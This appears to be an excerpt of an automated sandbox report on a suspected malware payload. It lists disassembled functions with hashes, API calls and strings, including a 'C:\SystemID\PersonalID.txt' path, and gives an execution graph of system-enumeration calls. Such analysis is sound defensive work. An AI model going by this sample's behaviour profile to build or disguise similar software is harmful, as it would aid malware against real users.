                                                                                                                                                                        • Instruction ID: 1fa300405a2e42dde38e7061665a38c963a15a25940620a00c40a27da3a24dfc
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ca302b95abaf62ea75d686b6bc6ab29e87c5f509e24ab560bc2234ba0745c32
                                                                                                                                                                        • Instruction Fuzzy Hash: A5E0C2763021247BF511235A6C8EFBF6A5CCBC37B6F500212F611E62E3CAA05D0281B0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F4920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: e81c785befce2a1ab07cfdf757b864c1e6f9329297637ef3c932c31da3a373b4
                                                                                                                                                                        • Instruction ID: 151819a2162ff7f8d2bf7de099b7425a0319fdb519a661555aefdd81b0e571ed
                                                                                                                                                                        • Opcode Fuzzy Hash: e81c785befce2a1ab07cfdf757b864c1e6f9329297637ef3c932c31da3a373b4
                                                                                                                                                                        • Instruction Fuzzy Hash: AFC13930720209DBCB24DE48D9D49BBF3BAFF84344B20452DEA468B655DBB0ED65CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00350040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                        • Opcode ID: c52cc277072dfadd5a8b015338d3d676d48f792ebaabd195e8cc460a2ede121c
                                                                                                                                                                        • Instruction ID: 793f58ae0fb82eaed2b09c1534a38640953d6cf3e15930cb77b1581bd370e1f9
                                                                                                                                                                        • Opcode Fuzzy Hash: c52cc277072dfadd5a8b015338d3d676d48f792ebaabd195e8cc460a2ede121c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6551FB7174030527E7366EA59C82F6777ACDF41B92F050829FD54D71E2EA53E9088172
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F7D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: bcd5a37cab699677d27161ff36d915493823a84aa599941810b99c689712bc5f
                                                                                                                                                                        • Instruction ID: 2e95e7c317bd273b2cc57527236337c55eecaae07c4f3d0b9b354be2d4b2f74b
                                                                                                                                                                        • Opcode Fuzzy Hash: bcd5a37cab699677d27161ff36d915493823a84aa599941810b99c689712bc5f
                                                                                                                                                                        • Instruction Fuzzy Hash: F351B33172410E9BCF24CE18D8809BAF7BAFF84380B60457EEA058B251D771ED65CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0030A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030AB93
                                                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 0030AC7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                        • String ID: 8?
                                                                                                                                                                        • API String ID: 3761405300-3606134346
                                                                                                                                                                        • Opcode ID: 1bd1db56c37a8c695559187d542515c0f352b9250734c6364d50e32a81ffc749
                                                                                                                                                                        • Instruction ID: 06984958d9db39a154d9931f9e87a0d49056e5a857968f961fd4a45effb28f90
                                                                                                                                                                        • Opcode Fuzzy Hash: 1bd1db56c37a8c695559187d542515c0f352b9250734c6364d50e32a81ffc749
                                                                                                                                                                        • Instruction Fuzzy Hash: E9213CB9541B04CBD75ACF5DFD91A607BECFB28310F50592AE5088B7A2D3B16940CF45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F3C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 002F3CA0
                                                                                                                                                                          • Part of subcall function 00303B4C: _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                        • _memset.LIBCMT ref: 002F3C83
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                                                        • Opcode ID: ec66e98293496620b86e71f56e6b70950fb4c04f6c72e0a75239e1016b0d6cd8
                                                                                                                                                                        • Instruction ID: e5f90b5bba2c0fe1960333f8150b615e6e209df1826e7b3f59e3313f6520c848
                                                                                                                                                                        • Opcode Fuzzy Hash: ec66e98293496620b86e71f56e6b70950fb4c04f6c72e0a75239e1016b0d6cd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 7801DEB29013159BD3309F1AE801767F6E8AF40B60F20883EE9A9976C0E7B1E954C790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        • Opcode ID: f4c3f8cc713b83533c2478bb78a858441ef88f4e9092b016230f2a92a4a969a7
                                                                                                                                                                        • Instruction ID: ed14f941161e9d0011847240224e7713e128e18242f90efe7898da6f845cb548
                                                                                                                                                                        • Opcode Fuzzy Hash: f4c3f8cc713b83533c2478bb78a858441ef88f4e9092b016230f2a92a4a969a7
                                                                                                                                                                        • Instruction Fuzzy Hash: DC1108729503469BCF31DF99DC5539EB7A0AF04314F600639EC5A56281E37299358BC2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00300DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00300E13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                                                        • Opcode ID: f6d8ff21e0f10913d57e650f88c2a2edd5e695d5085352c04ac144116fee573d
                                                                                                                                                                        • Instruction ID: 03cc22073e9410566232a72a286d3440c7b5c1becbbd5aad5ff784eb1e57313b
                                                                                                                                                                        • Opcode Fuzzy Hash: f6d8ff21e0f10913d57e650f88c2a2edd5e695d5085352c04ac144116fee573d
                                                                                                                                                                        • Instruction Fuzzy Hash: F8F0C87130BB118BF72ECBA5FE21B612798E711720F11083AF700FE1C0E734A9418695
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00360620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00360686
                                                                                                                                                                          • Part of subcall function 00334C00: _raise.LIBCMT ref: 00334C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0036062E
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00360638
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: da7d333ccdc0ae492d02d5c1801ef340633d94dfd2799137f43e6e95c7c4a446
                                                                                                                                                                        • Instruction ID: e72e716a12f4cdc0e3c6444b7772d3f567787b3b861194f8604d81419b863496
                                                                                                                                                                        • Opcode Fuzzy Hash: da7d333ccdc0ae492d02d5c1801ef340633d94dfd2799137f43e6e95c7c4a446
                                                                                                                                                                        • Instruction Fuzzy Hash: BF014B75600200AFC312DF19EC42E5AB7E5AFC8304F1A8469F588DB362D761ED558B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0032F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0032F251
                                                                                                                                                                          • Part of subcall function 00310CFC: std::exception::_Copy_str.LIBCMT ref: 00310D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0032F266
                                                                                                                                                                          • Part of subcall function 00310ECA: RaiseException.KERNEL32(?,?,0032F26B,?,?,00000000,?,?,?,?,0032F26B,?,003E81FC,?), ref: 00310F1F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                        • String ID: Te;
                                                                                                                                                                        • API String ID: 757275642-1031088568
                                                                                                                                                                        • Opcode ID: 03dc48a95e36984119854ca44da8f9873708b36af09dc366480727c16c2146a0
                                                                                                                                                                        • Instruction ID: df0541687c24305ea94370a5c52e4b9666e30e5d49fb5f7dae141fe363747221
                                                                                                                                                                        • Opcode Fuzzy Hash: 03dc48a95e36984119854ca44da8f9873708b36af09dc366480727c16c2146a0
                                                                                                                                                                        • Instruction Fuzzy Hash: AFD06275D0020DB7CB05EFA5C546CCD7B789A04344B008556AD145B145DA74A3898B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:7.9%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:182
                                                                                                                                                                        execution_graph 38806 c11920 38888 bbf7c0 38806->38888 38809 c119e2 GetProcAddress GetProcAddress 38810 c11a0b 38809->38810 38811 c11aab 38810->38811 38814 c11a1b NetStatisticsGet 38810->38814 38812 c11ac4 FreeLibrary 38811->38812 38813 c11acb 38811->38813 38812->38813 38815 c11ad5 GetProcAddress GetProcAddress GetProcAddress 38813->38815 38843 c11b0d __write_nolock 38813->38843 38816 c11a33 __write_nolock 38814->38816 38817 c11a69 NetStatisticsGet 38814->38817 38815->38843 38822 bed550 101 API calls 38816->38822 38817->38811 38818 c11a87 __write_nolock 38817->38818 38826 bed550 101 API calls 38818->38826 38819 c11bee 38820 c11c14 FreeLibrary 38819->38820 38821 c11c1b 38819->38821 38820->38821 38823 c11c31 LoadLibraryA 38821->38823 38824 c11c24 38821->38824 38825 c11a5a 38822->38825 38828 c11d4b 38823->38828 38829 c11c4a GetProcAddress GetProcAddress GetProcAddress 38823->38829 38908 be49a0 13 API calls 4 library calls 38824->38908 38825->38817 38826->38811 38831 c11d59 12 API calls 38828->38831 38832 c1223f 38828->38832 38839 c11c84 __write_nolock 38829->38839 38848 c11cac __write_nolock 38829->38848 38830 c11c29 38830->38823 38830->38828 38833 c12233 FreeLibrary 38831->38833 38834 c11e5c 38831->38834 38896 c12470 38832->38896 38833->38832 38834->38833 38855 c11ed9 CreateToolhelp32Snapshot 38834->38855 38837 c11d3f FreeLibrary 38837->38828 38838 c1225b __write_nolock 38841 bed550 101 API calls 38838->38841 38842 bed550 101 API calls 38839->38842 38840 c11d03 __write_nolock 38840->38837 38847 bed550 101 API calls 38840->38847 38844 c12276 GetCurrentProcessId 38841->38844 38842->38848 38843->38819 38846 bed550 101 API calls 38843->38846 38852 c11b7c __write_nolock 38843->38852 38845 c1228f __write_nolock 38844->38845 38850 bed550 101 API calls 38845->38850 38846->38852 38849 c11d3c 38847->38849 38848->38840 38851 bed550 101 API calls 38848->38851 38849->38837 38853 c122aa 38850->38853 38851->38840 38852->38819 38854 bed550 101 API calls 38852->38854 38909 bba77e 38853->38909 38854->38819 38855->38833 38857 c11ef0 38855->38857 38859 c11f03 GetTickCount 38857->38859 38860 c11f15 Heap32ListFirst 38857->38860 38858 c122ca 38859->38860 38861 c12081 38860->38861 38872 c11f28 __write_nolock 38860->38872 38862 c12095 GetTickCount 38861->38862 38863 c1209d Process32First 38861->38863 38862->38863 38864 c1210a 38863->38864 38867 c120b4 __write_nolock 38863->38867 38865 c12120 __write_nolock 38864->38865 38866 c12118 GetTickCount 38864->38866 38871 c12196 38865->38871 38876 bed550 101 API calls 38865->38876 38886 c12187 GetTickCount 38865->38886 38866->38865 38867->38864 38869 bed550 101 API calls 38867->38869 38878 c120fb GetTickCount 38867->38878 38869->38867 38870 c11f56 Heap32First 38870->38872 38873 c121a4 GetTickCount 38871->38873 38883 c121ac __write_nolock 38871->38883 38872->38861 38874 c1204e Heap32ListNext 38872->38874 38875 c12066 GetTickCount 38872->38875 38877 bed550 101 API calls 38872->38877 38884 c11ff1 GetTickCount 38872->38884 38890 bed550 38872->38890 38873->38883 38874->38861 38874->38872 38875->38861 38875->38872 38876->38865 38880 c11fd9 Heap32Next 38877->38880 38878->38864 38878->38867 38879 c12219 38881 c12229 38879->38881 38882 c1222d CloseHandle 38879->38882 38880->38872 38881->38833 38882->38833 38883->38879 38885 bed550 101 API calls 38883->38885 38887 c1220a GetTickCount 38883->38887 38884->38872 38885->38883 38886->38865 38886->38871 38887->38879 38887->38883 38889 bbf7d4 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 38888->38889 38889->38809 38889->38810 38891 bed559 38890->38891 38893 bed57d __write_nolock 38890->38893 38916 bfb5d0 101 API calls __except_handler4 38891->38916 38893->38870 38894 bed55f 38894->38893 38917 bea5e0 101 API calls __except_handler4 38894->38917 38897 c1247a __write_nolock 38896->38897 38898 c124c3 GetTickCount 38897->38898 38899 c12483 QueryPerformanceCounter 38897->38899 38902 c124d6 __write_nolock 38898->38902 38900 c12492 38899->38900 38901 c12499 __write_nolock 38899->38901 38900->38898 38904 bed550 101 API calls 38901->38904 38903 bed550 101 API calls 38902->38903 38905 c124ea 38903->38905 38906 c124b7 38904->38906 38907 c12244 GlobalMemoryStatus 38905->38907 38906->38898 38906->38907 38907->38838 38908->38830 38910 bba788 IsProcessorFeaturePresent 38909->38910 38911 bba786 38909->38911 38913 bbab9c 38910->38913 38911->38858 38918 bbab4b 5 API calls ___raise_securityfailure 38913->38918 38915 bbac7f 38915->38858 38916->38894 38917->38893 38918->38915 38919 b9a290 38924 bacc50 38919->38924 38933 bb3b4c 38924->38933 38926 bacc5d 38927 b9a299 38926->38927 38943 bdf1bb 59 API calls 3 library calls 38926->38943 38930 bb19ac 38927->38930 39019 bb18b0 38930->39019 38932 b9a2a8 38936 bb3b54 38933->38936 38935 bb3b6e 38935->38926 38936->38935 38938 bb3b72 std::exception::exception 38936->38938 38944 bb0c62 38936->38944 38961 bb793d DecodePointer 38936->38961 38962 bc0eca RaiseException 38938->38962 38940 bb3b9c 38963 bc0d91 58 API calls _free 38940->38963 38942 bb3bae 38942->38926 38945 bb0cdd 38944->38945 38953 bb0c6e 38944->38953 38973 bb793d DecodePointer 38945->38973 38947 bb0ce3 38948 bb5208 __woutput_s_l 57 API calls 38947->38948 38960 bb0cd5 38948->38960 38950 bb0ca1 RtlAllocateHeap 38950->38953 38950->38960 38952 bb0cc9 38970 bb5208 38952->38970 